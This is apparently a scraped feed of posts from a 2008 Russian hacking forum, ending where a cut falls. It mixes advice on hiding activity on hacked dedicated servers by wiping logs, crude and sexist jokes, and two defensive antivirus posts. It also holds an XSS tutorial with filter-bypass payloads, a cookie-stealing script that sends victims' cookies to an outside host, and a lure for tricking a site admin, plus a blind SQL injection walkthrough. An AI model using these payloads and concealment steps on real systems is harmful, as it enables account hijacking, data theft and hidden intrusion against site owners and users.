=&gt; щёлкаем правой кнопкой мыши по вкладке Users =&gt; Create new user. <br />net user имя_пользователя /add <br />net start (stop) имя_службы </p> <p>Там веддутся логи, мне нужна прога для очистки логов под OC Windows 2000? <br />Вот попробуй это: <br />.::Скачать::. - Запуск через CMD, там же хелп </p> <p>Если дедик ломаный. как шифроватся или что надо делать что бы хозяин не узнал? <br />clearlogs - юзать после каждого использоввание дедика. НЕ создовать файлы, папки и т.д на робочем столе. Всегда закрывать программы, окна и т.д при выходе. И меньше делать системный ошибок чтобы они не записывались в логах. </p> <p>Купил дедик, пользовалься 2 дня, а на третий немогу подключится, в чем трабла? <br />Ты просто засветился и твой аккаунт удалил админ, или дедик вырудили из инета. </p> <p>А где можно узнавать диапазоны ip? <br />wwwproxyserverprivacy.com </p> <p>Чтобы очистить логи надо зайти меню-выполнить-cmd-claerlogs!Всё правильно? <br />НЕТ, для начало его надо залить на дедик сам clearlogs. Пуск=&gt;Выполнить=&gt;cmd=&gt;cd\=&gt; потом указываешь папку где находиться сам софт=&gt; clearlogs.exe вылелит help . .=&gt; дальше указываешь какие именно логи чистить. <br />clearlogs - палится как логвайпер. . . hack tool</p> mybb@mybb.ru (AfeR) Mon, 20 Oct 2008 13:34:10 +0400 http://cah.hitbb.ru/viewtopic.php?pid=13#p13 http://cah.hitbb.ru/viewtopic.php?pid=12#p12 <p>Хакер читает внуку сказку:- &quot;...стал он кликать золотую рыбку...&quot;<br />- Деда, а почему рыбку?<br />- А потому, дружок, что мышек тогда еще не было. </p> <p>******</p> <p>Падает комп с 16-го этажа и думает: &quot;Вот сейчас бы зависнуть&quot; </p> <p>******</p> <p>Hа днях сyд гоpода Сан-Фpанциско пpиговоpил хакеpа Гойко Митича к десяти годам лишения свободы. Сейчас он yже отбывает наказание в колонии &quot;Пpииск Счастливый&quot; штата Аляска. По данным центpального компьютеpа полиции, завтpа, в 12:00, полностью отбыв сpок наказания, он выходит на свободy.</p> <p>******</p> <p>Родительское собpание для огpаниченного кpyга лиц (DOOMеp, DOOMеp - младший и диpектоp). Диpектоp: - Я должен с вами побеседовать об амоpальном поведении Вашего сына на пеpеменах. Он только и делает, что бегает за девочками!<br />DOOMеp: <br />- ПоDOOMаешь, все ноpмальные паpни в его возpасте бегают за девчонками!<br />Диpектоp:<br />- С бензопилой???!!! </p> <p>******</p> <p>Умер Билл Гейтс, предстал перед архангелом Петром. - Ну, что скажешь в свое оправдание? - Сурово спросил Петр, покручивая на пальце ключи от Рая. - Я осчастливил все человечество! - Это как?! - удивился Петр. - Ну, так ведь умер! </p> <p>******</p> <p>10 сходств Призедента РФ и Windows.<br />- Работают, но потоянно глючат;<br />- никто не знает чего от них ожидать;<br />- никому не нравятся, но вынужденны терпеть;<br />- никто не знает смысл их сообщений;<br />- имеют друзей по имени Билл;<br />- ожидаемая смена версий в 2000 году;<br />- оба имеют кнопку &quot;Пуск&quot; (у одного в чемодане, у второго на рабочем столе).<br />Но у Windows есть бесспорное приемущество при зависании всегда можно нажать кнопку Reset.</p> <p>******</p> <p>- Как определить, что факс отправила блондинка?<br />- На нем будет почтовая марка. </p> <p>******</p> <p>- Кто сочиняет анекдоты про блондинок?<br />- Брюнетки. Одинокими зимними вечерами.</p> <p>******</p> <p>Идет конкурс красоты. Hа сцене ведущий, блондинка, в зале ее группа поддержки - все сплошные блондинки.<br />- Итак, последнее задание на интеллект! Сколько будет дважды два?<br />(после долгих раздумий): - Пять!<br />- Hеправильно!<br />- Дайте ей еще шанс!<br />- Ладно. Сколько будет дважды два?<br />(после еще более долгих раздумий): - Три?<br />- Hеправильно!<br />- Дайте ей еще шанс! Пусть еще раз попробует!<br />- Ладно. Сколько будет дважды два?<br />(zzzzz...): - Четыре...<br />- Дайте ей еще шанс! Пусть попробует еще раз отгадать!</p> <p>******</p> <p>Блондинка едет по улице на авто, включает радио и слышит: <br />&quot;Вы слушаете радио &quot;Европа-плюс&quot; !&quot; <br />&quot;Господи, и откуда они всё знают?!&quot;- подумала блондинка... </p> <p>******</p> <p>Плывут два крокодила по Нилу разговаривают:<br />- А я вчера вечером блондинку проглотил. И до того пустая голова у неё была, что я до сих пор погрузиться не могу...</p> <p>******</p> <p>- Почему блондинок хоронят в треугольных гробах?<br />- Потому, что, когда у них закрываются глаза, сразу раздвигаются ноги!</p> <p>******</p> <p>- Почему блондинки не едят бананы?<br />- Hе могут найти &quot;молнию&quot;.</p> <p>******</p> <p>- Почему блондинки не едят соленые огуpцы?<br />- Голова в банку не пpолезает.</p> <p>******</p> <p>- Почему блондинки не пьют pаствоpимый кофе в пакетиках?<br />- Hе могут понять, как в такой пакетик влезает две чашки воды.</p> <p>******</p> <p>- Как блондинки пpокалывают уши?<br />- Втыкают кнопки в подплечники.</p> <p>******</p> <p>- Что блондинка думает о новом компьютеpе?<br />- Он ей не нpавится: не ловит 9-й канал.</p> <p>******</p> <p>- Какая pазница между блондинкой и компьютеpом?<br />- Инфоpмацию в компьютеp достаточно ввести только один pаз.</p> <p>******</p> <p>- Почему блондинкам не дают обеденного пеpеpыва?<br />- Слишком долго учить их заново.</p> mybb@mybb.ru (AfeR) Mon, 20 Oct 2008 13:24:53 +0400 http://cah.hitbb.ru/viewtopic.php?pid=12#p12 http://cah.hitbb.ru/viewtopic.php?pid=11#p11 <p><strong>7 советов по настройке антивирусной защиты.</strong></p> <p><strong><span style="color: red">7 подарков для вируса.</span></strong></p> <p><strong>1) Административные права в системе.<br />2) Уязвимые елементы железа и ПО.<br />3) Беспомощный антивирь.<br />4) Одинокий антивирь.<br />5) Старые антивирусные базы.<br />6) Некорректно настроенный антивирь.<br />7) Глупый пользователь.</strong></p> <p>Итак, рассмотрим всё по порядку…</p> <p><strong><span style="color: red">Административные права в системе.</span></strong></p> <p>Итак, Вы работаете под административной учетной записью, из которой можно без проблем получить приложение с уровнем System (в принципе, что и сделал Ваш антивирус, если он, конечно, установлен)… То же самое может сделать и вирус, при этом, данное повышение прав будет делать не само ядро, которое способен опознать и обезвредить антивирус, а небольшой, скорее всего быстро-мутирующий (т.е. изменяющий себя так, что невозможно объяснить антивирусу что именно нужно ловить), вобщем, быстро-мутирующий загрузчик выполнит вполне легальное действие возведя на уровень антивируса кусок зашифрованного кода… пара преобразований и на уровне System “большая бяка”…<br /><span style="color: red">99% что лечения Вы не найдёте, также высокий шанс того, что антивирусная система будет выведена из строя, либо вообще не заметит опасности, либо заметит, но вылечить не сможет.</span><br /><span style="color: green">Для решения проблемы достаточно не сидеть под учеткой с максимальными правами, а создать себе левую учетку. Хотите поиграться, полазить в инете? Для этого Вам не нужны права установки системных служб, а вот для большинства схем атаки сие является главным требованием (я описал довольно старый алгоритм, так что DiE KiDZ).</span></p> <p><strong><span style="color: red">Уязвимые елементы железа и ПО.</span></strong></p> <p>Теперь второй вариант получения высоких привилегий - это уязвимости. Причем не только в ПО, но и в железе - разработчики железа и микропрограмм тоже допускают ошибки, которыми не забывают пользоваться.<br /><span style="color: red">Вредоносная программа, локально используя RPC-DCOM получает командную строку от имени системы из-под любой учетки. Дальнейший сценарий печален и описан выше…</span><br /><span style="color: green">Обновляем софт, не держим старых версий, следим за уязвимостями ПО и железа, вовремя ставим заплатки и хотфиксы.</span></p> <p><strong><span style="color: red">Беспомощный антивирь.</span></strong></p> <p>Да, есть много антивирусных систем, которые имеют часто обновляемые базы, внимательных “лаборантов” и т.п… но… если антивирус не способен защитить сам себя, то что говорить о системе?.. Да, он защитит её от мелкой рыбёшки, но если к Вам попадёт что-нибудь серьёзное или целевое - еще один красный параграф:<br /><span style="color: red">Вирус, определяя установленную антивирусную систему, сносит её базы, заменяет DNS адреса его серверов обновления на несуществующий хост… Баз нет, обновления начинаются, но новых файлов антивирь не находит. Атака успешна - сушите вёсла…</span><br />Кроме того, антивири, которые отключаются временами… в это время большинство защитных систем отключены… результат - параграфом выше…<br /><span style="color: green">Решение - выбиаем антивири, которые могу за себя постоять - на данный момент лучшей в данном отношении является линейка Касперских. Да, они тормозят, да они тугодумы, но они работают, причем довольно качественно. Опять-таки, стоит учитывать условия - если машина дома без нета - такая защита Вам не нужна, если же инети варез для Вас ролдные слова - решайте - стать ботом-зомби в руках какого-нибудь хакера или сохранить чистый разум и процессорные секунды…</span><br /></p> <p><strong><span style="color: red">Одинокий антивирь.</span></strong></p> <p>Защита должна быть комплексной и многосторонней, причем опираться не на одно ядро, как это сделано в KIS… Поставьте отдельно антивирус с функцией файрволла и отдельно файрволл с функцией антивируса. При корректной настройке всё будет работать, в то же время антивирь и файр будут прикрывать друг-друга.</p> <p><strong><span style="color: red">Старые антивирусные базы.</span></strong></p> <p>Базы антивирусов - это такие “файлики” где хранятся сигнатуры - “лица” вырусов. По ним антивирус узнает - хорошая это программа или плохая… Если честно, то не наю как объяснить доходчивее… Если эти базы не обновлять, антивирус будет распознавать новые вируса, как “незнакомые” лица и пропускать их зелёным коридором…</p> <p><strong><span style="color: red">Некорректно настроенный антивирь.</span></strong></p> <p>Общий принцип не знаешь - не трогай конфиг!<br />Довольно часто попадаются машины с отключенной проверкой exe файлов… а ответом служит: “Так он же так быстрее работает!!! “…</p> <p><strong><span style="color: red">Глупый пользователь.</span></strong></p> <p>Сродни ненастроенному антивирю, только хуже.<br /><span style="color: red">Вася скачал из интернета программу, позволяющую получить ему под коврик мыши моментально 1 000 000 долларов. Внимательно изучив инструкцию, Вася узнал, что свой правильно настроенный соседом Димой антивирус надо отключить… Думаю, дальше всем понятно… А, если не понятно, то это клиника…</span><br /><span style="color: green">Да, сейчас разводы, а это был именно развод лохов, поумнее… Вам предложат участие где-нибуть и ненароком поросят ввести пароли доступа в систему под админом или что угодно еще… Запомните - шары не бывает за всё нужно платить.</span><br />А чем заплатите Вы в данном случае?.. Гуглите - Trojan-Proxy или Trijan-Downloader и т.п…</p> <p><span style="color: silver">(с) by Korvin-DraGO</span></p> mybb@mybb.ru (AfeR) Mon, 20 Oct 2008 13:14:55 +0400 http://cah.hitbb.ru/viewtopic.php?pid=11#p11 http://cah.hitbb.ru/viewtopic.php?pid=10#p10 <p><strong><span style="color: maroon">5 мифов о безопасности.</span></strong></p> <p>Разве компьютер, подключенный к Интернету, может быть заражен вирусом, если никакие файлы и сообщения электронной почты не открывались? Это ошибочное представление позволяет вирусописателям легко обманывать пользователей, необоснованно уверенных в безопасности своего ПК. Ниже описано пять подобных мифов.</p> <p><strong>1. Компьютер может быть заражен вирусом только в результате открытия файла или зараженного сообщения электронной почты.</strong></p> <p>Несколько лет назад это было действительно так. Однако в последнее время появились вирусы, которые применяют сразу несколько способов атак. Они проникают из Интернета через слабые места различных программ, чаще всего Windows и Internet Explorer. Такие вирусы самостоятельно находят в Сети новые жертвы — тех, кто не обновил свое ПО. Например, вирус Gaobot и «черви» Korgo, Blaster и Sasser ловили свои жертвы подобным образом.</p> <p><strong>2. Для защиты компьютера достаточно установить антивирусную программу.</strong></p> <p>Для обнаружения новых вирусов антивирусной программе должны быть известны их сигнатуры, т.е. отличительные особенности, в связи с чем в ней должно быть настроено регулярное автоматическое обновление. Однако и это не гарантирует полную защиту. Если вы не будете устранять бреши в защите программ путем установки обновлений, могут проявиться даже те вирусы, которые уже были удалены ранее. И для решения других проблем безопасности, таких как попытки вторжения и программы-шпионы, одного антивируса недостаточно. Для предотвращения угроз подобного типа следует установить брандмауэр и программу, блокирующую работу программ-шпионов.</p> <p><strong>3. Можно безо всякого риска открывать сообщения электронной почты от известных адресатов.</strong></p> <p>Это не так! Большинство вирусов, распространяющихся по электронной почте, используют адресную книгу своей жертвы. В связи с этим при получении электронных сообщений следует быть вдвойне осторожными, даже если они от знакомых. А столкнувшись с электронным сообщением, призывающим удовлетворить ваше любопытство, — как в случае с вирусом Bropia, соблазнявшим эротическими картинками, или вирусом Bobax, предлагавшим фотографии смерти Саддама Хусейна, — немедленно отправляйте его в корзину!</p> <p><strong>4. Попытки вторжения угрожают только тем пользователям, у которых есть высокоскоростное соединение с Интернетом.</strong></p> <p>Те, кто работает в Интернете с использованием высокоскоростного соединения, действительно больше подвержены угрозам. Они относятся к группе риска не из-за типа соединения, а из-за времени, проводимого в Сети. Пользователи, подолгу работающие с Интернетом по модемному соединению, подвержены точно такой же опасности. Исследования, проведенные компанией Symantec еще в 2002 г., показали следующее: брандмауэр в среднем блокирует 50 попыток вторжения ежедневно.</p> <p><strong>5. На моем компьютере не хранится никакая конфиденциальная информация, поэтому он не представляет интереса для программ-шпионов.</strong></p> <p>Большинство программ-шпионов собирают не конфиденциальную информацию (такую, как номера банковских карт или пароли), а сведения о действиях и операциях пользователя в Интернете. Регистрируются названия всех посещенных веб-узлов и щелчок на каждой ссылке. Исходя из этой информации пользователю демонстрируется та реклама, которая может его заинтересовать. Такие программы-шпионы, также известные как программы показа рекламы, используют ресурсы системы и замедляют работу компьютера. Если программы были загружены с веб-узлов, предназначенных только для взрослых, то они могут показывать изображения, которые не должны видеть дети. </p> <p><span style="color: silver">security.tsu.ru</span></p> mybb@mybb.ru (AfeR) Mon, 20 Oct 2008 12:56:57 +0400 http://cah.hitbb.ru/viewtopic.php?pid=10#p10 http://cah.hitbb.ru/viewtopic.php?pid=6#p6 <p>Привет!!!<br />В этой теме я хочу детально описать Xss от A до Я.<br />Так что начнём...</p> <p><span style="color: green">========================================<br />### Xss это Css =&gt; Cross Site Scripting<br />Чтобы не путать с CSS также назвыают XSS <br />Впервые этот БАГ появился в 1997.<br />=======================================</span></p> <p>### Как используют XSS?</p> <p>Для начала нам нужно знать что такое Cookie. <br />Если вы знаете, можете пропустить.</p> <p>Cookie служат для сохранения учетных данных сайта на компьютере поситителя.<br />Если вы зарегестрировались на сайте под ником 'blabluble', то сайт сохранил у вас на компьютере файл с cookies, где закодированы ваши данные.<br />А если вы есть админ и у вас есть доступ к сайту, а я - юзер, который украл у вас(админа) cookies, то я могу спокойно зайти на сайт, и сайт меня определяет как 'admin' - у меня будут администраторские права.</p> <p>Для смены(подстановки украденных) кук советую использувать прогу CookieEdit для IE или встроенные функции в Опере и Фаерфоксе.</p> <p>========================================<br />Мы разобрались что такое куки идём дальше...<br />Чтобы перехватить cookies надо найти место на сайте, где можно выполнить XSS-атаку.</p> <p>### Что такое XSS-атака?</p> <p>XSS атаки - это атаки не на сам сайт, а на пользователей сайта. <br />XSS - это недоработка в фильтре, приложении.</p> <p>Бывают пассивные XSS и активные XSS.</p> <p>Что такое пассивные XSS?</p> <p>Пассивные - это Xss, которые требуют от жертвы непосредственного участия + есть специфические ограничения и сложности. <br />Поэтому, пассивные XSS не очень ценятся.<br />Например, нужно заставить её пройти по ядовитой ссылке, что потребует социальной инженерии, хитрости.</p> <p>Активные - это XSS, которые, не требуют никаких дополнительных действий со стороны жертвы - ей достаточно лишь открыть страницу с вашим XSS и ява-код выполнится автоматически. <br />Благодаря своей автоматизированности - они очень полезны и ценны.<br />Например, активные хсс существуют в BB-тегах из-за недостаточной фильтрации, когда вы оставляете сообщение на форуме\гостевухе\чате, которое будет всегда активен при каждом обновлении.</p> <p>### Итак, перейду конкретно к тому, как найти на сайте XSS.</p> <p>Как я раньше уже писал что XSS состоит из тегов, они же состоят из html, и javascript языка =).</p> <p>Javascript можно вписывать в html.<br />Можно кодировать, чтобы обойти фильтры. Но об этом позже.</p> <p>Как узнать, что XSS на даном сайте проходит?</p> <p>Ужасна распрастраннёная узявимость типа: &lt;script&gt;alert()&lt;/script&gt; Пытаемся вставить во все различные поля этот скрипт... если вышло сообщение значит скрипт обработался и выполнился. </p> <p>Самая распостраненая XSS (наблюдаеться во всех местах где плохая фильтрация): &quot;&gt;&lt;script&gt;alert()&lt;/script&gt; <br />Вся суть в &quot;&gt; .<br />Давайте подумаем, что мы делаем, когда вводим в поле &quot;&gt;&lt;script&gt;alert()&lt;/script&gt; , что происходит? <br />Мы вводим в форму &quot;&gt;&lt;script&gt;alert()&lt;/script&gt; какой-то переменной присваиваеться значение поля. Переменная обрабатывается, &quot;&gt; выполняеться, закрывает <br />скрипт и выпролняет &lt;script&gt;alert()&lt;/script&gt; </p> <p>Эта XSS самая распостраненая в поисковиках:<br />Просматриваем все поля сайта и пытаемся вставить &quot;&gt;&lt;script&gt;alert()&lt;/script&gt; <br />Если вышло сообщение - вы нашли XSS...</p> <p>### А как определить есть фильтр или нет?</p> <p>Просто в любое поле вводим: '';!--&quot;&lt;fuck&gt;=&amp;{()}<br />Дальше открываем html страничку и ищем слово &quot;fuck&quot;<br />и смотри последующие сиволы.. </p> <p>Если &lt;&gt; так и остались то это перваый признак уязвимости - значит фильтр имеет дырку. <br />Если ,&quot;'\ символы остались такими, как были введены - это второй признак уязвимости - возможные дополнительные символы к последующей XSS атаке. <br />Затем, если открыв HTML, вы не обнаружили &lt;&gt; то скорее всего дырка в фильтре. <br />Если открыв HTML вы обнаружили, что &lt;&gt; заменены на другие символы, то это облом - фильтр по крайней <br />мере функционирует нормально. <br />Возможно еще ввести в поле для проверки фильтрации вот так: &quot;&gt;&lt;&gt;'&quot;`,/\?@%</p> <p>Рассмотрим случай если фильтр съедает &lt;&gt; </p> <p>В этом случае существует вероятность дырки. <br />К примеру, у фильтра условие съедать &lt;script&gt;,&lt;&gt; и . <br />Тогда пробуем &lt;zxcvbnzxc792&gt; и смотрим, если не съелось - нашли дырку...дальше можно составить боевой XSS-скрипт.</p> <p>Ещe существует метод вложенного скрипта, к примеру вот так: <br />&lt;sc&lt;script&gt;ript&gt;alert()&lt;/sc&lt;/script&gt;ript&gt; <br />это, если фильтр не оч. сильный и плохо фильтрует. </p> <p>Еще можно попробовать во так: <br />&gt;&gt;&gt;&gt;&lt;&lt;script бывает, что фильтр подсчитывает откр. и закр. скобки и закрывает сам. Сначало фильтрует, а потом закрывает... что дает нам дырку к инъекции скрипта. </p> <p>Частенько бывает что фильтр дополняет скрипт, к примеру вот этим :<br />http://******.ru/trye.asp?sessionID=&quot;&gt;&lt;IMG%20SRC=&quot;javascript:alert( ); </p> <p>Фильтр смотрит, что ничего опасного в &lt;IMG%20SRC=&quot;javascript:alert(); нет, закрывает и тем самым <br />выполняя скрипт. </p> <p>Еще конечно если фильтр не фильтрует различные кодировки то можно попытаться закодировать скрипт и вставить код. </p> <p>Все надо пытаться методом проб и ошибок искать...<br />Пытаться вводить в поля и внимательно просматривать что мы получили от фильтра. <br />Методом тыков понять, как фильтр работает, есть ли у него недоработки. <br />Если фильтр плохой, мы всегда можем вставить скрипты.</p> <p>### Активные XSS</p> <p>Тут надо использовать разрешенные теги и прекрываясь ими, надо выполнить запрос. </p> <p>Например, теги url,bb,img. <br />Весь смысл вставки заключается в том, что нам надо встроить запрос в париметр img или url. У Img есть много парметров кроме src и alt.<br />Этот баг очень часто используется на форуме, в гостевухах...</p> <p>Рассмотрим активные XSS.</p> <p>Предупреждения!!!<br />еги [fon*t],[im*g],[ur*l] пишутса с * для того, штобы они не использовались данным форумом.<br />Для использувания этих тегов удалите *. </p> <p>К примеру просмотрим форум на наличие использования тегов [fon*t],[im*g],[ur*l] и попытаться вставить в них скрипт или комбинировать их.:</p> <p>[im*g]httр://www.qwewqw.ru/1.jpg[/im*g] Выходит крестик...значит img используется и мы его подобрали (просто дело в том, что бывает img включен, а админы из создания сообщения его убирают, мол картинки вставлять нельзя и бывает он в использовании <br />разной формы) если крестика нет...а висит всего надпись, то попробуйте еще так: <br />[im*g src=httр://www.qwewqw.ru/1.jpg]</p> <p>Ну так вот к примеру мы добились крестика этим:<br />[im*g]httр://www.qweqw.ru/1.jpg[/im*g]</p> <p>Проверим держит ли фильтр пробел, добавляем пробел после расширения jpg :<br />[im*g]httр://www.qweqw.ru/1.jpg [/im*g] <br />если крестик есть - тогда всё ОК.</p> <p>Далее существуют у img параметры dynsrc и lowsrc которые держат яваскрипт. Пытаемся к примеру вставить: <br />[im*g]http://www.qwewqw.ru/1.jpg dynsrc=javascript:alert()[/im*g] <br />проверяем, отсылаем - появиться сообщение - значит нашли активную XSS и вместо alert() можете вставить любой скрипт. </p> <p>Если фильтр не сдался попробуйте так: <br />[im*g]http://www.qweqw.ru/&quot;/dynsrc=&quot;javascript:alert()&quot;/1.jpg[/im*g]<br />и <br />[im*g]http://www.qwewqw.ru/&quot;/dynsrc=javascript:alert()/1.jpg[/im*g]</p> <p>Если с приведённых примеров получился крестик, то httр://www.qweqw.ru/1.jpg заменяем на адрес сниффера.</p> <p>Бывают случаи, когда jpg отключен админом.</p> <p>###Мы всё время делали коды типа:</p> <p>&lt;script&gt;alert('HakNet')&lt;/script&gt;<br />javascript:alert('HakNet')<br />javascript:alert('HakNet')/1.jpg и так далие..<br />Но они никакой пользы не принесли, это просто коды для проверки(тестировки) на Xss.</p> <p>Вот скрипт:<br />&lt;script&gt;<br />img = new Image();<br />img.src = &quot;http://antichat.org/s/HakNet.gif?&quot;+document.cookie;<br />&lt;/script&gt;<br />Он уже ворует куки =)</p> <p>###Как его подставить к ссылке с Xss?</p> <p>Да очень легко...<br />Есть несколко вариантов:<br />- 1)делаем вот так:<br />http://*****.ru/free?p='&gt;&lt;script&gt;img=new Image();img.src=&quot;http://antichat.org/s/HakNet.gif?&quot;+document.cookie;&quot;+document.cookie;&lt;/script&gt;<br />где **** сайт с Xss.</p> <p>Вот сам составленый скрипт:<br />'&gt;&lt;script&gt;img = new Image();img.src=&quot;http://antichat.org/s/HakNet.gif?&quot;+document.cookie;&lt;/script&gt;</p> <p>- 2)Можно ещё делать вот так:<br />http://*****.ru/free?p='&gt;&lt;script src=http://haknet.h16.ru/script/js.js&gt;&lt;/script&gt;<br />где обращаетса к <a href="http://haknet.h16.ru/script/js.js" rel="nofollow" target="_blank">http://haknet.h16.ru/script/js.js</a></p> <p>а в js.js есть:<br />img=new Image();img.src=&quot;http://antichat.org/s/HakNet.gif?&quot;+document.cookie;<br />этот способ более надёжен.</p> <p>Но как я уже писал - иногда бывают затруднения с фильтрами на сайте (не прокатывает наш скрипт).<br />Тогда нужно подумать, как его обойти.<br />Можно просто нечто добавить, нечто поменять, или удалить в скрипте.<br />Но есть более надёжным вариант, когда мы просто закодируем скрипт. Для этого есть много прог. <br />Есть такой сайт как <a href="http://ha.ckers.org/xss.html" rel="nofollow" target="_blank">http://ha.ckers.org/xss.html</a> (кодировщик-дэкодировщик).</p> <p>Вот пример:<br />%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E</p> <p>это был закодированный:</p> <p>http://*****.ru/free?p='&gt;&lt;script src=http://haknet.h16.ru/script/js.js&gt;&lt;/script&gt;</p> <p>- 3) Особенно шифрование необходимо не только для обмана фильтров, но и для обмана АДМИНА при использовании ПАССИВНОЙ ХСС.</p> <p>Вот такой пример на основе социальной инженерии.<br />Ищем контакт с админом форума бросаем в форуме ему линк на свой сайт, и говориш типа так &quot;клевая фича есть на сайте&quot; и так дале в том же духе. <br />А на нашем сайте будет как вы уже догадались =) вот ето скрипт:</p> <p>&lt;script language=&quot;JavaScript&quot;&gt; <br />document.location.href=&quot;%68%74%74%70%3A%2F%2F%2A%2 A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E&quot; <br />&lt;/script&gt;</p> <p>Что делает document.location.href вы спросите меня? )).. это ява-код, который без запроса переходит на указаной сайт Так чо ж у нас получается, дали мы линк админу, и он зашел на наш сайт, вот что делается.. его быстро бросает на</p> <p>%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E<br />а это уже и есть наш Xss в зашифрованом виде.</p> <p><span style="color: red">Примечание: это подействует только тогда, когда Xss будет принадлежать админу сайта которому вы бросили линк... <br />Иными словами ТРУДНОСТЬ ПАССИВНОЙ ХСС состоит в том, что уязвимость может быть использована ТОЛЬКО, если жертва АВТОРИЗОВАНА на уязвимом сайте!!!</span></p> mybb@mybb.ru (AfeR) Mon, 20 Oct 2008 10:23:03 +0400 http://cah.hitbb.ru/viewtopic.php?pid=6#p6 http://cah.hitbb.ru/viewtopic.php?pid=5#p5 <p><span style="color: red">[into]</span></p> <p>Прежде всего, я хочу сказать спасибо большенству авторов статей про blind sql injection, за то, что они не могут объяснить и раскрыть тему с нуля, а втирают только про запутанные и никому не нужные функции, хоть и правильные, но безтолковые, я пишу статью для тех, кого интересует ответы на вечные вопросы... а одним из них является обход union'а в запросах. Чтобы хорошо усвоить все, я рекомендую вам свою статью по sql injection </p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>http://forum.whack.ru/showthread.php?t=193</pre></div></div></div><p><span style="color: red">[немного из истории]</span></p> <p>многие из нас знают про существование sql injection древнейший баг, многие люди искали эффективную защиту, усложняя жизнь взломщикам, одним из средств защиты является отрезание работоспособности необходимых функций, для этого взломщики приспособились к blind sql injection... Баг тоже не очень то и молодой... Принцип атаки тот же, только немного геморнее... Поехали к делу...</p> <p><span style="color: red">[Осмотр местности]</span><br />для начала нам нужно узнать присутствует ли баг в скрипте, который обращается к бд... Имеем такой скрипт</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=10</pre></div></div></div><p>ставим кавычку</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=10'</pre></div></div></div><p>если есть ошибка работы с базой данных, то есть вероятность о наличии sql инъекции</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=11-1</pre></div></div></div><p>если будет аналогично что и</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=10</pre></div></div></div><p>то это тоже скорее всего sql injection<br />если</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=10+order+by+1--</pre></div></div></div><p>ошибки нет а при</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=10+order+by+100000000--</pre></div></div></div><p>ошибка есть то это sql injection .<br />далее мы подобрали поля</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=10+union+select+1,2,3,4,5,6--</pre></div></div></div><p>но выводимые поля отсутствуют или вообще ничего нет, то тогда надо прибегнуть к попытке проведения blind sql injection<br />[Необходимые функции]<br />substring(1,2,3) - Это нам выдаст подстроку длиной 3 из строки 2 начиная с первой позиции<br />ascii - возращает нам значение из таблицы ascii <br />lower - все буквы будут переведены в нижний регистр, эта функция пригодится нам для удобства<br />к примеру <br />SELECT LOWER('ZXCVB');<br />вернет нам 'zxcvb'<br />обзор функций закончен идем дальше<br />[Практическое применение]</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),1,1)))&gt;97</pre></div></div></div><p>запрос дал нам положительный результат, то есть выдалась страница что и </p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=11</pre></div></div></div><p>это означает, что в ascii наш первый символ из user() находится под номером &gt;97 <br />идем дальше</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),1 ,1)))&gt;115</pre></div></div></div><p>выдает нам отрицательный результат то есть не тоже самое что при простом id=11<br />значит в ascii наш символ находится &lt;115<br />далее </p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),1,1)))&gt;106</pre></div></div></div><p>результат положительный, символ в ascii &gt;106</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),1,1)))&gt;108</pre></div></div></div><p>результат отрицательный<br />вот наш символ в таблице находится 106 и 108 включительно, так как у нас знак &gt; о равенстве тут речи не идет</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),1,1)))=106</pre></div></div></div><p>результат отрицательный</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.site.ru/index.php?id=11+AND+ascii(lower(substring(user(),1,1)))=107</pre></div></div></div><p>результат отрицательный</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 